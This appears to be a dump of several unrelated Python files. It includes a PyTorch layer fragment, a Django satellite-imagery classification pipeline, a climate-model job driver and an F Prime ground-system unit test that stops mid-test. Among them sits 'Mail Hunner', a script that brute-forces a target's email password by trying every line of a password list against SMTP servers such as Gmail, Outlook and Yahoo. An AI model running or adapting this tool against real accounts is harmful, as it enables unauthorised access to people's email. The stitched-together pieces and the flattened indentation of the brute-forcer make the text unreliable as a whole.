            eps (float, optional): Used to avoid division by zero.
                Defaults to 1e-10.
        """
        super(L2Norm, self).__init__()
        self.n_dims = n_dims
        self.weight = nn.Parameter(torch.Tensor(self.n_dims))
        self.eps = eps
        self.scale = scale

    def forward(self, x):
        """Normalize `x` along dim 1 and rescale by the learned weights."""
        # Compute in FP32 so the norm stays stable under FP16 training.
        x_f32 = x.float()
        l2 = x_f32.pow(2).sum(1, keepdim=True).sqrt() + self.eps
        rescaled = (
            self.weight[None, :, None, None].float().expand_as(x_f32)
            * x_f32 / l2
        )
        return rescaled.type_as(x)
|
<reponame>dymaxionlabs/satlomas-back
import os
import shutil
from django.conf import settings
from eo_sensors.utils import run_otb_command
RESULTS_DIR = os.path.join(settings.BASE_DIR, "data", "images", "results")
RESULTS_SRC = os.path.join(RESULTS_DIR, "src")
RESULTS_FEAT = os.path.join(RESULTS_DIR, "feats")
MODEL_PATH = os.path.join(settings.BASE_DIR, "data", "rf_model.yaml")
SRTM_DEM_PATH = os.path.join(settings.BASE_DIR, "data", "srtm_dem.tif")
def predict(period):
    """Run the feature-extraction and classification pipeline for a period."""
    date_from = period.date_from
    date_to = period.date_to
    # Tag like "<Yf><Mf>_<Yt><Mt>" used in every intermediate file name.
    period_tag = "{}{}_{}{}".format(
        date_from.year, date_from.month, date_to.year, date_to.month
    )
    s2_10m = "s2_{}_10m".format(period_tag)
    s2_20m = "s2_{}_20m".format(period_tag)
    s1 = "s1_{}".format(period_tag)
    srtm = "srtm_dem"

    # The 10 m Sentinel-2 raster is the reference grid; copy it as-is.
    shutil.copyfile(
        os.path.join(RESULTS_SRC, "{}.tif".format(s2_10m)),
        os.path.join(RESULTS_FEAT, "{}.tif".format(s2_10m)),
    )
    # Resample every other raster onto the 10 m grid.
    superimpose(s2_20m, s2_10m)
    superimpose(s1, s2_10m)
    shutil.copyfile(SRTM_DEM_PATH, os.path.join(RESULTS_SRC, "{}.tif".format(srtm)))
    superimpose(srtm, s2_10m)

    # Per-band local statistics and Haralick texture features.
    for raster, num_bands in ((s2_10m, 8), (s2_20m, 6), (s1, 3), (srtm, 1)):
        for band in range(1, num_bands + 1):
            extract_local_stats(raster, band)
            extract_haralick(raster, band)

    concatenate_images()
    classify_image()
def superimpose(inm, inr):
    """Resample raster ``inm`` onto the grid of reference raster ``inr``,
    writing the result into the features directory."""
    ref_path = os.path.join(RESULTS_SRC, "{}.tif".format(inr))
    src_path = os.path.join(RESULTS_SRC, "{}.tif".format(inm))
    out_path = os.path.join(RESULTS_FEAT, "{}.tif".format(inm))
    run_otb_command(
        "otbcli_Superimpose -inr {inr} -inm {inm} -out {out}".format(
            inr=ref_path, inm=src_path, out=out_path
        )
    )
def extract_local_stats(name, band):
    """Compute radius-3 local statistics for one band of a feature raster."""
    in_path = os.path.join(RESULTS_FEAT, "{}.tif".format(name))
    out_path = os.path.join(
        RESULTS_FEAT, "local_stats_{}_{}.tif".format(name, band)
    )
    run_otb_command(
        "otbcli_LocalStatisticExtraction -in {input} -channel {band} -radius 3 -out {out}".format(
            input=in_path, band=band, out=out_path
        )
    )
def extract_haralick(name, band):
    """Extract simple Haralick texture features for one band of a raster."""
    in_path = os.path.join(RESULTS_FEAT, "{}.tif".format(name))
    out_path = os.path.join(RESULTS_FEAT, "haralick_{}_{}.tif".format(name, band))
    run_otb_command(
        "otbcli_HaralickTextureExtraction -in {input} -channel {band} -texture simple -parameters.min 0 -parameters.max 0.3 -out {out}".format(
            input=in_path, band=band, out=out_path
        )
    )
def concatenate_images():
    """Concatenate all feature rasters into a single features.tif.

    Changes into the features directory so the shell `ls` expansion in the
    OTB command sees the feature files.
    """
    current_dir = os.getcwd()
    os.chdir(RESULTS_FEAT)
    try:
        run_otb_command(
            "otbcli_ConcatenateImages -il $(ls {il}) -out {out}".format(
                il=RESULTS_FEAT,
                out=os.path.join(RESULTS_DIR, "features.tif"),
            )
        )
    finally:
        # Always restore the working directory, even if the OTB call raises;
        # the original version left the process stranded in RESULTS_FEAT.
        os.chdir(current_dir)
def classify_image():
    """Run the trained model over the stacked feature raster, producing cover.tif."""
    features_path = os.path.join(RESULTS_DIR, "features.tif")
    cover_path = os.path.join(RESULTS_DIR, "cover.tif")
    run_otb_command(
        "otbcli_ImageClassifier -in {input} -model {model} -out {out}".format(
            input=features_path, model=MODEL_PATH, out=cover_path
        )
    )
|
import smtplib
import os,sys
import time,random
import threading
import argparse
H = '\033[95m'
B = '\033[94m'
G = '\033[92m'
W = '\033[93m'
F = '\033[91m'
E = '\033[0m'
U = '\033[4m'
O = '\033[33m'
serv = None
port = 587
os.chdir('modules/')
parser = argparse.ArgumentParser(description="Framework Hunner")
parser.add_argument('login', help='Target email')
parser.add_argument('password', help='<PASSWORD>')
args = parser.parse_args()
if args.login or args.password:
login = args.login
password_list = args.password
if os.path.exists(password_list):
file = open(password_list,'r')
else:
print(F+'File not exist'+E)
sys.exit(1)
def banner():
text1 = '''
___ ___ _ _ _ _
| \/ | (_) | | | |
| . . | __ _ _| | |_| |_ _ _ __ _ __ ___ _ __
| |\/| |/ _` | | | _ | | | | '_ \| '_ \ / _ \ '__|
| | | | (_| | | | | | | |_| | | | | | | | __/ |
\_| |_/\__,_|_|_\_| |_/\__,_|_| |_|_| |_|\___|_|
'''
text2 = '''
_ _
/\/\ __ _(_) | /\ /\_ _ _ __ _ __ ___ _ __
/ \ / _` | | |/ /_/ / | | | '_ \| '_ \ / _ \ '__|
/ /\/\ \ (_| | | / __ /| |_| | | | | | | | __/ |
\/ \/\__,_|_|_\/ /_/ \__,_|_| |_|_| |_|\___|_|
'''
if random.randrange(0,1) == 0:
print(text1)
else:
print(text2)
def clear():
os.system('clear')
def check_mail():
global serv
clear()
banner()
print(B+'Enter servese smtp:'+E)
print(H+"""
1) Gmail
2) Outlook
3) Yahoo
4) At&T
5) Mail.com
6) Comcast
7) By hand
"""+E)
ServerSmtp = input(W+'Hunner»Mail»ServerSmtp»'+E)
if int(ServerSmtp) == 1:
serv = 'smtp.gmail.com'
port = 465
elif int(ServerSmtp) == 2:
serv = 'smtp-mail.outlook.com'
port = 587
elif int(ServerSmtp) == 3:
serv = 'smtm.mail.yahoo.com'
port = 587
elif int(ServerSmtp) == 4:
serv = 'smtm.mail.att.net'
port = 465
elif int(ServerSmtp) == 5:
serv = 'smtm.mail.com'
port = 587
elif int(ServerSmtp) == 6:
serv = 'smtm.comcast.com'
port = 587
elif int(ServerSmtp) == 7:
serv = input('Enter smtp server (Exemple:smtp.gmail.com)')
port = input('Enter port smtp server (Default port: 587)')
else:
print('Error ')
sys.exit(1)
def brut():
print(F+'Start brutforse'+E)
try:
smtp = smtplib.SMTP(str(serv), int(port))
smtp.ehlo()
smtp.starttls()
except:
print(error)
for line in file:
try:
passw = line.strip('\r\n')
smtp.login(login, passw)
print(W+time.ctime()+B+' Work mail login-> '+W+login+B+' password-> '+W+passw)
break
sys.exit(1)
except:
print(F + time.ctime() + E + ' Not work ->'+E+login+E+'Password ->'+E+passw)
check_mail()
t1 = threading.Thread(target=brut)
t1.start()
|
<reponame>tomvothecoder/pcmdi_metrics<filename>pcmdi_metrics/enso/scripts_pcmdi/parallel_driver.py
#!/usr/bin/env python
"""
Usage example:
1. First realization per model
./parallel_driver.py -p my_Param_ENSO.py --mip cmip6 --modnames all --realization r1i1p1f1 --metricsCollection ENSO_perf
2. All realizations of individual models
./parallel_driver.py -p my_Param_ENSO.py --mip cmip6 --modnames all --realization all --metricsCollection ENSO_perf
"""
from __future__ import print_function
from genutil import StringConstructor
from pcmdi_metrics.enso.lib import AddParserArgument, find_realm
from pcmdi_metrics.variability_mode.lib import sort_human
from pcmdi_metrics.misc.scripts import parallel_submitter
import glob
import os
# =================================================
# Collect user defined options
# -------------------------------------------------
param = AddParserArgument()
# Pre-defined options
mip = param.mip
exp = param.exp
print('mip:', mip)
print('exp:', exp)
# Path to model data as string template
modpath = param.process_templated_argument("modpath")
# Check given model option
models = param.modnames
print('models:', models)
# Include all models if conditioned
# CLIVAR_LE filenames separate template fields with '_'; all others use '.'
if mip == "CLIVAR_LE":
    inline_separator = '_'
else:
    inline_separator = '.'
if ('all' in [m.lower() for m in models]) or (models == 'all'):
    # Locate the position of the %(model) field inside the filename template,
    # then harvest the model names from the files actually present on disk.
    model_index_path = param.modpath.split('/')[-1].split(inline_separator).index("%(model)")
    models = ([p.split('/')[-1].split(inline_separator)[model_index_path] for p in glob.glob(modpath(
        mip=mip, exp=exp, model='*', realization='*', variable='ts'))])
    # remove duplicates
    models = sorted(list(dict.fromkeys(models)), key=lambda s: s.lower())
print('models:', models)
print('number of models:', len(models))
# Realizations: '*' means "discover every available run member"
realization = param.realization
if ('all' in [r.lower() for r in realization]) or (realization == 'all'):
    realization = '*'
print('realization: ', realization)
# Metrics Collection
mc_name = param.metricsCollection
# case id
case_id = param.case_id
print('case_id:', case_id)
# Output directory template; output_type is left unresolved for later fills
outdir_template = param.process_templated_argument("results_dir")
outdir = StringConstructor(str(outdir_template(
    output_type='%(output_type)',
    mip=mip, exp=exp, metricsCollection=mc_name, case_id=case_id)))
# Debug
debug = param.debug
print('debug:', debug)
# =================================================
# Create output directories
# -------------------------------------------------
for output_type in ['graphics', 'diagnostic_results', 'metrics_results']:
    if not os.path.exists(outdir(output_type=output_type)):
        os.makedirs(outdir(output_type=output_type))
    print(outdir(output_type=output_type))
# Pick the parameter file for the given MIP. This must be a single
# if/elif/else chain: the original used two independent `if` statements, so
# the trailing `else` always overwrote the obs2obs assignment and the
# obs2obs parameter file was never actually used.
if mip == "obs2obs":
    param_file = '../param/my_Param_ENSO_obs2obs.py'
elif mip == "CLIVAR_LE":
    # param_file = '../param/my_Param_ENSO_PCMDIobs_CLIVAR_LE-CESM1-CAM5.py'
    param_file = '../param/my_Param_ENSO_PCMDIobs_CLIVAR_LE_CanESM2.py'
else:
    param_file = '../param/my_Param_ENSO_PCMDIobs.py'
cmds_list = []
logfilename_list = []
for model in models:
    print(' ----- model: ', model, ' ---------------------')
    # Find all xmls for the given model
    realm, areacell_in_file = find_realm('ts', mip)
    model_path_list = glob.glob(
        modpath(mip=mip, exp=exp, realm=realm, model=model, realization="*", variable='ts'))
    # sort in nice way
    model_path_list = sort_human(model_path_list)
    if debug:
        print('model_path_list:', model_path_list)
    try:
        # Find where run can be gripped from given filename template for modpath
        run_in_modpath = modpath(mip=mip, exp=exp, realm=realm, model=model, realization=realization,
                                 variable='ts').split('/')[-1].split(inline_separator).index(realization)
        if debug:
            print('run_in_modpath:', run_in_modpath)
        # Collect available runs
        runs_list = [model_path.split('/')[-1].split(inline_separator)[run_in_modpath]
                     for model_path in model_path_list]
    except Exception:
        # NOTE(review): if this except fires while realization is "*" or
        # "all", runs_list is left undefined and the loop below raises
        # NameError -- confirm whether that path can actually occur.
        if realization not in ["*", "all"]:
            runs_list = [realization]
    if debug:
        print('runs_list (all):', runs_list)
    # Check if given run member is included. If not for all runs and given run member is not included,
    # take alternative run
    if realization != "*":
        if realization in runs_list:
            runs_list = [realization]
        else:
            runs_list = runs_list[0:1]
    if debug:
        print('runs_list (revised):', runs_list)
    for run in runs_list:
        # command line for queue
        cmd = ['enso_driver.py',
               '-p', param_file,
               '--mip', mip, '--metricsCollection', mc_name,
               '--case_id', case_id,
               '--modnames', model,
               '--realization', run]
        cmds_list.append(' '.join(cmd))
        # log file for each process
        logfilename = '_'.join(['log_enso', mc_name, mip, exp, model, run, case_id])
        logfilename_list.append(logfilename)
print(' --- jobs to submit ---')
for cmd in cmds_list:
    print(cmd)
print(' --- end of jobs to submit ---')
# =================================================
# Run subprocesses in parallel
# -------------------------------------------------
# log dir
log_dir = outdir(output_type='log')
os.makedirs(log_dir, exist_ok=True)
# number of tasks to submit at the same time
# num_workers = 7
# num_workers = 10
num_workers = 15
# num_workers = 30
# num_workers = 25
# Dispatch one enso_driver.py invocation per command, num_workers at a time,
# writing each job's output to its matching log file under log_dir.
parallel_submitter(cmds_list, log_dir=log_dir,
                   logfilename_list=logfilename_list,
                   num_workers=num_workers)
|
<filename>Gds/test/fprime_gds/common/testing_fw/api_unit_test.py
import math
import os
import sys
import threading
import time
import unittest
# these imports are needed to generate data objects.
from fprime.common.models.serialize.numerical_types import I32Type, U32Type
from fprime.common.models.serialize.time_type import TimeType
from fprime_gds.common.data_types.ch_data import ChData
from fprime_gds.common.data_types.cmd_data import CmdData
from fprime_gds.common.data_types.event_data import EventData
from fprime_gds.common.history.test import TestHistory
from fprime_gds.common.pipeline.standard import StandardPipeline
from fprime_gds.common.testing_fw import predicates
from fprime_gds.common.testing_fw.api import IntegrationTestAPI
from fprime_gds.common.utils.config_manager import ConfigManager
filename = os.path.dirname(__file__)
gdsName = os.path.join(filename, "../../../../src")
fprimeName = os.path.join(filename, "../../../../../Fw/Python/src")
sys.path.insert(0, gdsName)
sys.path.insert(0, fprimeName)
class UTPipeline(StandardPipeline):
    """
    This pipeline shares many of the same calls available in pipeline.standard. It
    is used by this testcase to feed simulated data to the test api.
    """

    def __init__(self):
        # Number of commands sent so far; drives the CommandCounter channel.
        self.command_count = 0
        # Base timestamp added to wall-clock offsets for simulated data times.
        self.t0 = TimeType()
        StandardPipeline.__init__(self)

    def connect(self, address, port):
        """No-op: this simulated pipeline never opens a real connection."""
        pass

    def disconnect(self):
        """No-op: nothing was connected, so there is nothing to tear down."""
        pass

    def send_command(self, command, args):
        """Simulate a command send: record it and emit the events/telemetry a
        real target would produce in response."""
        command_template = self.dictionaries.command_id[command]
        cmd_data = CmdData(tuple(args), command_template)
        self.histories.commands.data_callback(cmd_data)
        for hist in self.coders.command_subscribers:
            hist.data_callback(cmd_data)
        # Echo a CommandReceived event carrying the command's opcode.
        ev_temp = self.dictionaries.event_name["CommandReceived"]
        event = EventData((U32Type(cmd_data.get_id()),), self.t0 + time.time(), ev_temp)
        self.enqueue_event(event)
        # Report current history sizes (events, commands, channels).
        ev_temp = self.dictionaries.event_name["HistorySizeUpdate"]
        evr_size = U32Type(len(self.histories.events.retrieve()))
        cmd_size = U32Type(len(self.histories.commands.retrieve()))
        ch_size = U32Type(len(self.histories.channels.retrieve()))
        event = EventData((evr_size, cmd_size, ch_size), self.t0 + time.time(), ev_temp)
        self.enqueue_event(event)
        # Bump and publish the CommandCounter channel.
        self.command_count += 1
        ch_temp = self.dictionaries.channel_name["CommandCounter"]
        update = ChData(U32Type(self.command_count), self.t0 + time.time(), ch_temp)
        self.enqueue_telemetry(update)

    def enqueue_event(self, event):
        """
        Used by the unit test to feed simulated data objects into the pipeline
        """
        self.coders.event_decoder.send_to_all(event)

    def enqueue_telemetry(self, channel):
        """
        Used by the unit test to feed simulated data objects into the pipeline
        """
        self.coders.channel_decoder.send_to_all(channel)
class APITestCases(unittest.TestCase):
@classmethod
def setUpClass(cls):
    """Build the simulated pipeline and the integration test API once for
    the whole test class."""
    cls.pipeline = UTPipeline()
    config = ConfigManager()
    path = os.path.join(filename, "./UnitTestDictionary.xml")
    down_store = os.path.join(filename, "./")
    cls.pipeline.setup(config, path, down_store)
    log_path = os.path.join(filename, "./logs")
    cls.api = IntegrationTestAPI(cls.pipeline, log_path)
    cls.case_list = []  # TODO find a better way to do this.
    cls.threads = []
def setUp(self):
    """Per-test setup: join leftover worker threads from the previous test,
    then open a fresh test case and working history."""
    for t in self.threads:
        # Thread.isAlive() was removed in Python 3.9; is_alive() is the
        # supported spelling (available since Python 2.6).
        if t.is_alive():
            t.join()
    self.threads.clear()
    count = len(self.case_list)
    self.api.start_test_case(self._testMethodName, count)
    self.case_list.append(1)
    self.tHistory = TestHistory()
    self.t0 = TimeType()
@classmethod
def tearDownClass(cls):
    """Tear down the shared pipeline and test API after all cases have run."""
    cls.pipeline.disconnect()
    cls.api.teardown()
######################################################################################
# Test Case Helper Methods
######################################################################################
def fill_history(self, callback, items, timestep=0.0):
    """Feed every item in ``items`` to ``callback``, sleeping ``timestep``
    seconds before each one; data objects without a time are stamped "now"."""
    for entry in items:
        if timestep:
            time.sleep(timestep)
        # Stamp untimed data objects so time-based searches can see them.
        if isinstance(entry, (ChData, EventData)) and entry.time == 0:
            entry.time = self.t0 + time.time()
        callback(entry)
def fill_history_async(self, callback, items, timestep=1.0):
    """Run fill_history on a background thread and return the started thread;
    the thread is also tracked in self.threads for cleanup in setUp."""
    worker = threading.Thread(
        target=self.fill_history, args=(callback, items, timestep)
    )
    self.threads.append(worker)
    worker.start()
    return worker
@staticmethod
def assert_lists_equal(expected, actual):
assert len(expected) == len(
actual
), "the given list should have had the length {}, but instead had {}\nExpected {}\nActual{}".format(
len(expected), len(actual), expected, actual
)
for i in range(len(expected)):
assert (
expected[i] == actual[i]
), "the {} element of the expected list should be {}, but was {}.".format(
i, expected[i], actual[i]
)
def get_counter_sequence(self, length):
    """Return ``length`` Counter channel updates with values 0..length-1."""
    return [
        ChData(
            U32Type(value),
            TimeType(),
            self.pipeline.dictionaries.channel_name["Counter"],
        )
        for value in range(length)
    ]
def get_oscillator_sequence(self, length):
    """Return ``length`` Oscillator updates following int(round(10*sin(i deg)))."""
    updates = []
    for step in range(length):
        amplitude = int(round(10 * math.sin(math.radians(step))))
        template = self.pipeline.dictionaries.channel_name["Oscillator"]
        updates.append(ChData(I32Type(amplitude), TimeType(), template))
    return updates
def get_severity_event(self, severity="DIAGNOSTIC"):
    """Build one argument-less event of the given severity
    (dictionary name "Severity" + severity)."""
    template = self.pipeline.dictionaries.event_name["Severity" + severity]
    return EventData(tuple(), TimeType(), template)
def get_severity_sequence(self, length, severity="DIAGNOSTIC"):
    """Return a list of ``length`` identical events of the given severity."""
    return [self.get_severity_event(severity) for _ in range(length)]
class AssertionFailure(Exception):
    """
    Used to differentiate an AssertionError in test cases that intentionally raise an
    assertion error (so the test harness's own asserts are not confused with it).
    """
######################################################################################
# Test Cases
######################################################################################
def test_dummy_pipeline(self):
    """Sanity-check the simulated pipeline: streamed events reach the api."""
    length = 15
    event_list = self.get_severity_sequence(length)
    t1 = self.fill_history_async(self.pipeline.enqueue_event, event_list, 0.1)
    print("waiting for queue to fill")
    pred = predicates.greater_than_or_equal_to(length // 2)
    results = self.api.await_event_count(pred)
    assert pred(len(results)), "the correct amount of objects was received"
    t1.join()
    evr_hist = self.api.get_event_test_history()
    item_count = len(evr_hist)
    assert item_count == length, "Were the correct number of items in the history? ({},{})".format(item_count, length)
def test_find_history_item(self):
    """find_history_item should honor the start index and return None on a miss."""
    self.fill_history(self.tHistory.data_callback, range(0, 50))
    self.fill_history(self.tHistory.data_callback, range(0, 50))
    pred = predicates.equal_to(25)
    result = self.api.find_history_item(pred, self.tHistory)
    assert result == 25, "The search should have returned 25, but found {}".format(result)
    # The second copy of 0..49 starts at index 50, so 25 is found again.
    result = self.api.find_history_item(pred, self.tHistory, start=50)
    assert result == 25, "The search should have returned 25, but found {}".format(result)
    # Starting at 80 skips past the last occurrence of 25.
    result = self.api.find_history_item(pred, self.tHistory, start=80)
    assert result is None, "The search should have returned None, but found {}".format(result)
def test_find_history_item_timeout(self):
    """find_history_item should await incoming items until the timeout expires."""
    pred = predicates.equal_to(25)
    listA = range(0, 50)
    self.fill_history_async(self.tHistory.data_callback, listA, 0.01)
    result = self.api.find_history_item(pred, self.tHistory, timeout=1)
    assert result == 25, "The search should have returned 25, but found {}".format(result)
    pred = predicates.equal_to(49)
    result = self.api.find_history_item(pred, self.tHistory, timeout=1)
    assert result == 49, "The search should have returned 49, but found {}".format(result)
    self.tHistory.clear()
    listA = range(0, 50)
    pred = predicates.equal_to(49)
    # Items now arrive 0.1 s apart, so 49 cannot show up within the 1 s timeout.
    self.fill_history_async(self.tHistory.data_callback, listA, 0.1)
    result = self.api.find_history_item(pred, self.tHistory, timeout=1)
    assert result is None, "The search should have returned None, but found {}".format(result)
def test_find_history_sequence(self):
    """find_history_sequence should match ordered predicates from a start index."""
    sequence = []
    for i in range(30, 40, 2):
        sequence.append(predicates.equal_to(i))
    self.fill_history(self.tHistory.data_callback, range(0, 50))
    results = self.api.find_history_sequence(sequence, self.tHistory)
    assert len(results) == len(sequence), "The search should have found {}, but returned {}".format(range(30, 40, 2), results)
    self.assert_lists_equal(range(30, 40, 2), results)
    # Starting mid-sequence leaves too few matching items after index 34.
    results = self.api.find_history_sequence(sequence, self.tHistory, start=34)
    assert len(results) != len(sequence), "The search should have returned an incomplete list, but found {}".format(results)
    self.fill_history(self.tHistory.data_callback, range(0, 50))
    results = self.api.find_history_sequence(sequence, self.tHistory, start=34)
    assert len(results) == len(sequence), "The search should have found {}, but returned {}".format(range(30, 40, 2), results)
    self.assert_lists_equal(range(30, 40, 2), results)
    results = self.api.find_history_sequence(sequence, self.tHistory, start=90)
    assert len(results) != len(sequence), "The search should have returned an incomplete list, but found {}".format(results)
def test_find_history_sequence_timeout(self):
    """find_history_sequence should await a full ordered match until the timeout."""
    sequence = []
    for i in range(30, 40, 2):
        sequence.append(predicates.equal_to(i))
    self.fill_history_async(self.tHistory.data_callback, range(0, 50), 0.01)
    results = self.api.find_history_sequence(sequence, self.tHistory, timeout=1)
    assert results is not None, "The search should have found a sequence"
    self.assert_lists_equal(range(30, 40, 2), results)
    self.fill_history_async(self.tHistory.data_callback, range(0, 50), 0.01)
    results = self.api.find_history_sequence(
        sequence, self.tHistory, start=34, timeout=1
    )
    assert results is not None, "The search should have found a sequence"
    self.assert_lists_equal(range(30, 40, 2), results)
    self.tHistory.clear()
    # Items arrive every 0.1 s, so a full match cannot appear within 1 s.
    self.fill_history_async(self.tHistory.data_callback, range(25, 50), 0.1)
    results = self.api.find_history_sequence(
        sequence, self.tHistory, start=90, timeout=1
    )
    assert len(results) != len(sequence), "The search should have returned an incomplete list, but found {}".format(results)
def test_find_history_count(self):
    """find_history_count should collect items passing the search predicate."""
    count_pred = predicates.greater_than_or_equal_to(10)
    search_pred = predicates.greater_than_or_equal_to(40)
    self.fill_history(self.tHistory.data_callback, range(0, 50))
    results = self.api.find_history_count(count_pred, self.tHistory)
    self.assert_lists_equal(range(0, 50), results)
    results = self.api.find_history_count(count_pred, self.tHistory, search_pred)
    self.assert_lists_equal(range(40, 50), results)
    self.fill_history(self.tHistory.data_callback, range(50, 70))
    results = self.api.find_history_count(count_pred, self.tHistory, search_pred)
    self.assert_lists_equal(range(40, 70), results)
    results = self.api.find_history_count(count_pred, self.tHistory, start=60)
    self.assert_lists_equal(range(60, 70), results)
def test_find_history_count_timeout(self):
    """find_history_count should await until enough matching items arrive."""
    count_pred = predicates.greater_than_or_equal_to(10)
    search_pred = predicates.greater_than_or_equal_to(40)
    self.fill_history_async(self.tHistory.data_callback, range(0, 50), 0.01)
    # Without a timeout the search returns immediately, before items >= 40 arrive.
    results = self.api.find_history_count(count_pred, self.tHistory)
    assert len(results) < 10, "The search should have returned an incomplete list, but found {}".format(results)
    results = self.api.find_history_count(
        count_pred, self.tHistory, search_pred, timeout=2
    )
    self.assert_lists_equal(range(40, 50), results)
    self.fill_history_async(self.tHistory.data_callback, range(50, 60), 0.01)
    results = self.api.find_history_count(
        count_pred, self.tHistory, search_pred, start=50, timeout=2
    )
    self.assert_lists_equal(range(50, 60), results)
    self.tHistory.clear()
    # Items arrive 0.1 s apart, so 10 matches cannot accumulate within 1 s.
    self.fill_history_async(self.tHistory.data_callback, range(35, 60), 0.1)
    results = self.api.find_history_count(
        count_pred, self.tHistory, search_pred, timeout=1
    )
    assert len(results) < 10, "The search should have returned an incomplete list, but found {}".format(results)
def test_get_latest_fsw_time(self):
    """get_latest_time should advance only while data objects are streaming."""
    ts0 = self.api.get_latest_time()
    time.sleep(0.1)
    ts1 = self.api.get_latest_time()
    assert ts0 is ts1, "The starting timestamp should not have changed if no dataobjects were enqueued"
    count_seq = self.get_counter_sequence(100)
    event_seq = self.get_severity_sequence(100)
    t1 = self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.02)
    t2 = self.fill_history_async(self.pipeline.enqueue_event, event_seq, 0.02)
    last = ts0
    # While both streams are active, the latest time must keep advancing.
    for i in range(1, 10):
        time.sleep(0.1)
        tsi = self.api.get_latest_time()
        assert tsi > last, "Iter {}: {} should be greater than {}".format(i, tsi, last)
        last = tsi
    t1.join()
    t2.join()
    tsn_1 = self.api.get_latest_time()
    assert tsn_1 > last, "The final timestamp, {}, should be greater than {}.".format(tsn_1, last)
    time.sleep(0.1)
    tsn_2 = self.api.get_latest_time()
    assert tsn_2 == tsn_1, "The timestamp should not have changed, while no data was streaming."
def test_clear_histories(self):
    """clear_histories should truncate histories, optionally from a timestamp."""
    eventHistory = self.api.get_event_test_history()
    channelHistory = self.api.get_telemetry_test_history()
    commandHistory = self.api.get_command_test_history()
    self.api.clear_histories()
    assert eventHistory.size() == 0, "eventHistory should be empty"
    assert channelHistory.size() == 0, "channelHistory should be empty"
    count_seq = self.get_counter_sequence(100)
    event_seq = self.get_severity_sequence(100)
    t1 = self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.02)
    t2 = self.fill_history_async(self.pipeline.enqueue_event, event_seq, 0.02)
    t1.join()
    t2.join()
    sizeE = eventHistory.size()
    iE = sizeE // 2
    firstE = eventHistory[iE]
    timeE = firstE.get_time()
    sizeC = channelHistory.size()
    iC = 0
    # Find the first channel update at or after the chosen event timestamp.
    for i in range(0, channelHistory.size()):
        if channelHistory[i].get_time() >= timeE:
            iC = i
            break
    firstC = channelHistory[iC]
    # Clearing from a timestamp keeps only items at or after that time.
    self.api.clear_histories(timeE)
    msg = "The event history should have been reduced by {} elements".format(iE)
    assert sizeE - iE == eventHistory.size(), msg
    msg = "The element with the timestamp should be first in the history"
    assert firstE is eventHistory[0], msg
    msg = "The channel history should have been reduced by {} elements".format(iC)
    assert sizeC - iC == channelHistory.size(), msg
    msg = "The first element in the history should be the first with a valid time"
    assert firstC is channelHistory[0], msg
    args1 = []
    # A command send populates all three histories via the UTPipeline.
    self.api.send_command("apiTester.TEST_CMD_1", args1)
    assert commandHistory.size() > 0, "history size should be greater than 0"
    assert channelHistory.size() > 0, "history size should be greater than 0"
    assert eventHistory.size() > 0, "history size should be greater than 0"
    self.api.clear_histories()
    assert commandHistory.size() == 0, "history size should be 0"
    assert channelHistory.size() == 0, "history size should be 0"
    assert eventHistory.size() == 0, "history size should be 0"
def test_registering_and_removing_subhistories(self):
    """Subhistories should collect data only while registered and be
    unaffected by clear_histories on the main histories."""
    # Verifying that retrieving a subhistory for events behaves as expected
    event_hist = self.api.get_event_test_history()
    self.pipeline.enqueue_event(self.get_severity_event())
    assert event_hist.size() == 1, "There should be one event in the api's history"
    event_subhist = self.api.get_event_subhistory()
    assert event_subhist.size() == 0, "There should be no events in the subhistory"
    self.pipeline.enqueue_event(self.get_severity_event())
    assert event_hist.size() == 2, "There should be two events in the api's history"
    assert event_subhist.size() == 1, "There should be one event in the subhistory"
    assert self.api.remove_event_subhistory(event_subhist), "remove should succeed"
    # After removal the subhistory stops receiving new events.
    self.pipeline.enqueue_event(self.get_severity_event())
    assert event_hist.size() == 3, "There should be three events in the api's history"
    assert event_subhist.size() == 1, "There should be one event in the subhistory"
    self.api.clear_histories()
    assert event_hist.size() == 0, "There should be no events in the api's history"
    assert event_subhist.size() == 1, "There should be one event in the subhistory"
    assert not self.api.remove_event_subhistory(event_subhist), "should not remove twice"
    # same checks, but for telemetry
    telem_seq = self.get_counter_sequence(3)
    telem_hist = self.api.get_telemetry_test_history()
    self.pipeline.enqueue_telemetry(telem_seq[0])
    assert telem_hist.size() == 1, "There should be one update in the api's history"
    telem_subhist = self.api.get_telemetry_subhistory()
    assert telem_subhist.size() == 0, "There should be no updates in the subhistory"
    self.pipeline.enqueue_telemetry(telem_seq[1])
    assert telem_hist.size() == 2, "There should be two updates in the api's history"
    assert telem_subhist.size() == 1, "There should be one update in the subhistory"
    assert self.api.remove_telemetry_subhistory(telem_subhist), "remove should succeed"
    self.pipeline.enqueue_telemetry(telem_seq[2])
    assert telem_hist.size() == 3, "There should be three updates in the api's history"
    assert telem_subhist.size() == 1, "There should be one update in the subhistory"
    self.api.clear_histories()
    assert telem_hist.size() == 0, "There should be no updates in the api's history"
    assert telem_subhist.size() == 1, "There should be one update in the subhistory"
    assert not self.api.remove_telemetry_subhistory(telem_subhist), "should not remove twice"
def test_translate_command_name(self):
    """translate_command_name should map names and ids to opcodes and raise
    KeyError for unknown inputs."""
    assert self.api.translate_command_name("apiTester.TEST_CMD_1") == 1
    assert self.api.translate_command_name("apiTester.TEST_CMD_2") == 2
    assert self.api.translate_command_name("apiTester.TEST_CMD_3") == 3
    # Numeric ids pass through unchanged.
    assert self.api.translate_command_name(1) == 1
    assert self.api.translate_command_name(2) == 2
    assert self.api.translate_command_name(3) == 3
    try:
        self.api.translate_command_name("DOES_NOT_EXIST")
        assert False, "the api should have raised a KeyError"
    except KeyError:
        assert True, "the api raised the correct error"
    try:
        self.api.translate_command_name(0)
        assert False, "the api should have raised a KeyError"
    except KeyError:
        assert True, "the api raised the correct error"
def test_send_command(self):
    """send_command should accept both names and ids and record every send."""
    args1 = []
    self.api.send_command("apiTester.TEST_CMD_1", args1)
    self.api.send_command(1, args1)
    args2 = ["0x01", "0x02"]
    self.api.send_command("apiTester.TEST_CMD_2", args2)
    self.api.send_command(2, args2)
    args3 = ["test message for the test command"]
    self.api.send_command("apiTester.TEST_CMD_3", args3)
    self.api.send_command(3, args3)
    hist = self.api.get_command_test_history()
    assert hist.size() == 6
    for cmd in hist:
        print(cmd)
def test_send_and_await_telemetry(self):
    """send_and_await_telemetry should collect the requested channel sequence
    after sending the command."""
    result = self.api.send_and_await_telemetry(
        "apiTester.TEST_CMD_1", channels="CommandCounter"
    )
    assert result is not None, "the search should find the telemetry generated by UTPipeline"
    self.api.clear_histories()
    # One CommandCounter update from the send, then five Counter updates.
